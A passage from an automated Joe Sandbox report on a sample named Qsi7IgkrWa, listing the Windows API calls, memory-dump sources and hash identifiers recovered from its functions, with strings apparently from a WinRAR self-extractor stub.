                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                        • Instruction ID: 37d79d8cfdd1f51c743893636cca223be7cca60ffafc8b22db40f90d9f591e51
                                        • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                        • Instruction Fuzzy Hash: DB116D71580B05BAE520B7B1CC07FDBFBED9F44B00F400D6AB29D66292EA66A505D750
                                        APIs
                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00BCE669,00BCE5CC,00BCE86D), ref: 00BCE605
                                        • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00BCE61B
                                        • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00BCE630
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AddressProc$HandleModule
                                        • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                        • API String ID: 667068680-1718035505
                                        • Opcode ID: 93c8cb2ec57983780c3ba138af30121ec414f20a0173c186d9fb2322b4821c46
                                        • Instruction ID: b66385da2cc2ae964027bc8d9c8ac6ba746404cf1bb0759dce4e1e7b137b46cb
                                        • Opcode Fuzzy Hash: 93c8cb2ec57983780c3ba138af30121ec414f20a0173c186d9fb2322b4821c46
                                        • Instruction Fuzzy Hash: A0F0C2327B26A2DB0F314F655CD9FAA32C8AA3675531444FDEE25D7110EB24CD505AD0
                                        APIs
                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00BC14C2
                                          • Part of subcall function 00BBB146: GetVersionExW.KERNEL32(?), ref: 00BBB16B
                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00BC14E6
                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00BC1500
                                        • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00BC1513
                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00BC1523
                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00BC1533
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: Time$File$System$Local$SpecificVersion
                                        • String ID:
                                        • API String ID: 2092733347-0
                                        • Opcode ID: 37620a617d32bfcf4a5a999c23f5a8d826a3b6607464852941592c7f6427d539
                                        • Instruction ID: 1486c19582a375e2ad14cb75a0322496ecf7f741dd697049cc445e4a94d5ee3e
                                        • Opcode Fuzzy Hash: 37620a617d32bfcf4a5a999c23f5a8d826a3b6607464852941592c7f6427d539
                                        • Instruction Fuzzy Hash: DC31E875118345ABC704DFA8C88599BB7F8FF98714F004A1EF996D3210E730D549CBA6
                                        APIs
                                        • GetLastError.KERNEL32(?,?,00BD2AF1,00BD02FC,00BCFA34), ref: 00BD2B08
                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00BD2B16
                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00BD2B2F
                                        • SetLastError.KERNEL32(00000000,00BD2AF1,00BD02FC,00BCFA34), ref: 00BD2B81
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: ErrorLastValue___vcrt_
                                        • String ID:
                                        • API String ID: 3852720340-0
                                        • Opcode ID: b2e9ba9560288802f0dbeb3ce200f186b8819ba81f79917b0bd98545047b40a5
                                        • Instruction ID: ee24a62a59bcea452a42a6137be99c1873e2ad5e73b810fb977af9fde630d725
                                        • Opcode Fuzzy Hash: b2e9ba9560288802f0dbeb3ce200f186b8819ba81f79917b0bd98545047b40a5
                                        • Instruction Fuzzy Hash: 9E014C321097512EA7142B747CC5916EBC5EF22B71B300BBBF0204B3E1FF918C005500
                                        APIs
                                        • GetLastError.KERNEL32(?,00BF1030,00BD4674,00BF1030,?,?,00BD3F73,00000050,?,00BF1030,00000200), ref: 00BD97E9
                                        • _free.LIBCMT ref: 00BD981C
                                        • _free.LIBCMT ref: 00BD9844
                                        • SetLastError.KERNEL32(00000000,?,00BF1030,00000200), ref: 00BD9851
                                        • SetLastError.KERNEL32(00000000,?,00BF1030,00000200), ref: 00BD985D
                                        • _abort.LIBCMT ref: 00BD9863
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_free$_abort
                                        • String ID:
                                        • API String ID: 3160817290-0
                                        • Opcode ID: 0d162c2f4b48fe8b4fd6040859823e8b24036347ec0df940ab7e773edebd0203
                                        • Instruction ID: c530fcae7376ba1f25bdf5b158c19f7530e35e464cbd68ab236d3389de19b5a5
                                        • Opcode Fuzzy Hash: 0d162c2f4b48fe8b4fd6040859823e8b24036347ec0df940ab7e773edebd0203
                                        • Instruction Fuzzy Hash: A3F0F43610060167C75233247C8AB1B9AE6CFD2FB1F3000BAF525AB3D2FE22CC01A521
                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00BCDC47
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00BCDC61
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BCDC72
                                        • TranslateMessage.USER32(?), ref: 00BCDC7C
                                        • DispatchMessageW.USER32(?), ref: 00BCDC86
                                        • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00BCDC91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                        • String ID:
                                        • API String ID: 2148572870-0
                                        • Opcode ID: c9369c7ab4c1a8e9ef85386a3fefc9e764e0f160b4fc8d3cdc7534da36b79440
                                        • Instruction ID: 8efd43ed9258c549820ee6287c5a1f07947ef4b9c8634a693b456a6c7369e9a3
                                        • Opcode Fuzzy Hash: c9369c7ab4c1a8e9ef85386a3fefc9e764e0f160b4fc8d3cdc7534da36b79440
                                        • Instruction Fuzzy Hash: 4BF03C72A01259BBCF20ABA5DC4CFDF7FADEF46795B008021B50AE2051D674C646C7A0
                                        APIs
                                          • Part of subcall function 00BC05DA: _wcslen.LIBCMT ref: 00BC05E0
                                          • Part of subcall function 00BBB92D: _wcsrchr.LIBVCRUNTIME ref: 00BBB944
                                        • _wcslen.LIBCMT ref: 00BBC197
                                        • _wcslen.LIBCMT ref: 00BBC1DF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: _wcslen$_wcsrchr
                                        • String ID: .exe$.rar$.sfx
                                        • API String ID: 3513545583-31770016
                                        • Opcode ID: 4df984b8b07eee7ba1d02da741dddebe56827d381ed755d42c056ae850a2947e
                                        • Instruction ID: 5c3af1b62e2abcf31d3c14438dd4ee6fb7a5e52c251dfa884f883ec630c1c65d
                                        • Opcode Fuzzy Hash: 4df984b8b07eee7ba1d02da741dddebe56827d381ed755d42c056ae850a2947e
                                        • Instruction Fuzzy Hash: AB41F42654075197C731FF688846EBABBE8EF41B44F1449CEF992BB182EBD04D81C3A5
                                        APIs
                                        • GetTempPathW.KERNEL32(00000800,?), ref: 00BCCE9D
                                          • Part of subcall function 00BBB690: _wcslen.LIBCMT ref: 00BBB696
                                        • _swprintf.LIBCMT ref: 00BCCED1
                                          • Part of subcall function 00BB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BB40A5
                                        • SetDlgItemTextW.USER32(?,00000066,00BF946A), ref: 00BCCEF1
                                        • EndDialog.USER32(?,00000001), ref: 00BCCFFE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                        • String ID: %s%s%u
                                        • API String ID: 110358324-1360425832
                                        • Opcode ID: c27ffefbfa57659b55a5b39e49f5bfff99e91efeadf11f6141150eabcd105c86
                                        • Instruction ID: 4fe7db225d07f34354c79b9b30628657adcb6738f388060064c84faac9579673
                                        • Opcode Fuzzy Hash: c27ffefbfa57659b55a5b39e49f5bfff99e91efeadf11f6141150eabcd105c86
                                        • Instruction Fuzzy Hash: AE416DB5900259AADF259B508C85FEE77ECEB15304F4080EAFA09E7151EF709A84CF65
                                        APIs
                                        • _wcslen.LIBCMT ref: 00BBBB27
                                        • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00BBA275,?,?,00000800,?,00BBA23A,?,00BB755C), ref: 00BBBBC5
                                        • _wcslen.LIBCMT ref: 00BBBC3B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: _wcslen$CurrentDirectory
                                        • String ID: UNC$\\?\
                                        • API String ID: 3341907918-253988292
                                        • Opcode ID: 3323c18e24dd15d7e5671e899e3e922c31afc7906377504db3e3855b3ff9d991
                                        • Instruction ID: 9da00980e61290d6b460d82463f8b9b562bf3495217b06bfd95b3d33c163ac85
                                        • Opcode Fuzzy Hash: 3323c18e24dd15d7e5671e899e3e922c31afc7906377504db3e3855b3ff9d991
                                        • Instruction Fuzzy Hash: 00418E35440255BBCB21EF60CC45EFA7BE9EF45790F1044EAF955A3152EBF0DA908AA0
                                        APIs
                                        • LoadBitmapW.USER32(00000065), ref: 00BCB6ED
                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 00BCB712
                                        • DeleteObject.GDI32(00000000), ref: 00BCB744
                                        • DeleteObject.GDI32(00000000), ref: 00BCB767
                                          • Part of subcall function 00BCA6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00BCB73D,00000066), ref: 00BCA6D5
                                          • Part of subcall function 00BCA6C2: SizeofResource.KERNEL32(00000000,?,?,?,00BCB73D,00000066), ref: 00BCA6EC
                                          • Part of subcall function 00BCA6C2: LoadResource.KERNEL32(00000000,?,?,?,00BCB73D,00000066), ref: 00BCA703
                                          • Part of subcall function 00BCA6C2: LockResource.KERNEL32(00000000,?,?,?,00BCB73D,00000066), ref: 00BCA712
                                          • Part of subcall function 00BCA6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00BCB73D,00000066), ref: 00BCA72D
                                          • Part of subcall function 00BCA6C2: GlobalLock.KERNEL32(00000000), ref: 00BCA73E
                                          • Part of subcall function 00BCA6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00BCA762
                                          • Part of subcall function 00BCA6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00BCA7A7
                                          • Part of subcall function 00BCA6C2: GlobalUnlock.KERNEL32(00000000), ref: 00BCA7C6
                                          • Part of subcall function 00BCA6C2: GlobalFree.KERNEL32(00000000), ref: 00BCA7CD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                        • String ID: ]
                                        • API String ID: 1797374341-3352871620
                                        • Opcode ID: a08b5455c3fe2252aad28b7338f16daa576ca63f04233a7ddfd2ff6d88ab8f3f
                                        • Instruction ID: d88dfa168e7782ede0adc3f8748552aa52c1dfdb47bdac71230510ac22dfda9c
                                        • Opcode Fuzzy Hash: a08b5455c3fe2252aad28b7338f16daa576ca63f04233a7ddfd2ff6d88ab8f3f
                                        • Instruction Fuzzy Hash: CE01C036500209A7CB1277749C0AFBF7AF9EBC5B5AF0900AAFD00B7291DF218D0546B2
                                        APIs
                                          • Part of subcall function 00BB1316: GetDlgItem.USER32(00000000,00003021), ref: 00BB135A
                                          • Part of subcall function 00BB1316: SetWindowTextW.USER32(00000000,00BE35F4), ref: 00BB1370
                                        • EndDialog.USER32(?,00000001), ref: 00BCD64B
                                        • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00BCD661
                                        • SetDlgItemTextW.USER32(?,00000066,?), ref: 00BCD675
                                        • SetDlgItemTextW.USER32(?,00000068), ref: 00BCD684
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: ItemText$DialogWindow
                                        • String ID: RENAMEDLG
                                        • API String ID: 445417207-3299779563
                                        • Opcode ID: 74c4defbecb3044df2cab83a2b7ac51d2bf8bc53fb11bea8054f658c439e1020
                                        • Instruction ID: 7e67ff487a5a05d8f23094abf6f8af4513c62acfe50e6fee194007a4ee4b0832
                                        • Opcode Fuzzy Hash: 74c4defbecb3044df2cab83a2b7ac51d2bf8bc53fb11bea8054f658c439e1020
                                        • Instruction Fuzzy Hash: B901F537344314BBE2208F649D49FAE77DCFB5AB01F114478F305A2091C7A29905CB75
                                        APIs
                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00BD7E24,00000000,?,00BD7DC4,00000000,00BEC300,0000000C,00BD7F1B,00000000,00000002), ref: 00BD7E93
                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00BD7EA6
                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00BD7E24,00000000,?,00BD7DC4,00000000,00BEC300,0000000C,00BD7F1B,00000000,00000002), ref: 00BD7EC9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AddressFreeHandleLibraryModuleProc
                                        • String ID: CorExitProcess$mscoree.dll
                                        • API String ID: 4061214504-1276376045
                                        • Opcode ID: cd9101b26ff306358328fb362b040d3beeaaa1a3df57bf6f03e8bf5f712c9954
                                        • Instruction ID: e6a5f09c7e48e852cb76e9d2a904aaf23328fc6f47ce53222a90b80de1565d57
                                        • Opcode Fuzzy Hash: cd9101b26ff306358328fb362b040d3beeaaa1a3df57bf6f03e8bf5f712c9954
                                        • Instruction Fuzzy Hash: 54F03135940248BBDB119BA1DC4DBAEFFF9EF44751F0041E9E805A7260EF309E40CA90
                                        APIs
                                          • Part of subcall function 00BC081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00BC0836
                                          • Part of subcall function 00BC081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00BBF2D8,Crypt32.dll,00000000,00BBF35C,?,?,00BBF33E,?,?,?), ref: 00BC0858
                                        • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00BBF2E4
                                        • GetProcAddress.KERNEL32(00BF81C8,CryptUnprotectMemory), ref: 00BBF2F4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AddressProc$DirectoryLibraryLoadSystem
                                        • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                        • API String ID: 2141747552-1753850145
                                        • Opcode ID: 3d77d48d6ee9614989a72a7bcab2409f485f4ba1a5fde455e82d7dbd450dd3f1
                                        • Instruction ID: 223553431e802d7fe61bdd04afd67d8dfc43053a83ec369cd85451f002d23e6c
                                        • Opcode Fuzzy Hash: 3d77d48d6ee9614989a72a7bcab2409f485f4ba1a5fde455e82d7dbd450dd3f1
                                        • Instruction Fuzzy Hash: E8E086709107829FC7209F359C4DB657AD4AF04F00F14C8EDF0DA93661DBB4D5808B50
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
